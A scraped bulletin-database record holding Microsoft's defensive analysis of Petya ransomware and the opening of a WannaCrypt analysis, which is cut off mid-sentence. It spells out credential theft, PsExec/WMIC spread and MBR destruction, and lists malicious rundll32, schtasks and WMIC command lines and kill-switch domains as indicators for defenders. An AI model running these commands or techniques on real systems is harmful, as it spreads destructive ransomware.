MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/129.png)\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary to the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute the malware remotely using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored in the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set to 1 (generic), it uses that credential to propagate through the network.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-access-admin.png)\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-wmic.png)\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet.png)\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet-2.png)\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). 
However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-encryption-1.png)\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-exploit-udpate.png)\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-MBR-overwrite-udpate.png)\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-fake-message.png)\n\nIt then displays this ransom note:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-ransom-note.png)\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-file-mapping-API.png)\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-rsa-public-encryption-key.png)\n\n_Embedded RSA public key_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-aes-128-key.png)\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-infect-mbr.png)\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-readme.png)\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. 
Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offer machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with a different filename, and the creation of the _perfc.dat_ file in remote share (UNC) paths.\n\nToday, without the need for additional updates, an infected machine may look like this:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP1.png)\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP2.png)\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. 
Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be advisable for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute itself on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. 
Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which 
captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "title": "New ransomware, old techniques: Petya adds worm capabilities", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 1049, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", 
"MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "187de40875213635b40951240733ecd480e8174a7d8a8f46ce25caa0492dc93e", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "2ed33d64012a372c3bd45d454ea4fb3b"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "ff956db5f2cf47d328e1cbc09bc91885"}, {"key": "href", "hash": "10dc22e225dabcc0845efb8de70d835b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "696a19be15ef6061e7b6c7e4759f53bb"}, {"key": "published", "hash": "696a19be15ef6061e7b6c7e4759f53bb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "baa30f28b70995adbfcbcd6ddaba2ec0"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 
review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. 
However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. 
A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[![wannacrypt1](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[![wannacrypt2](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected 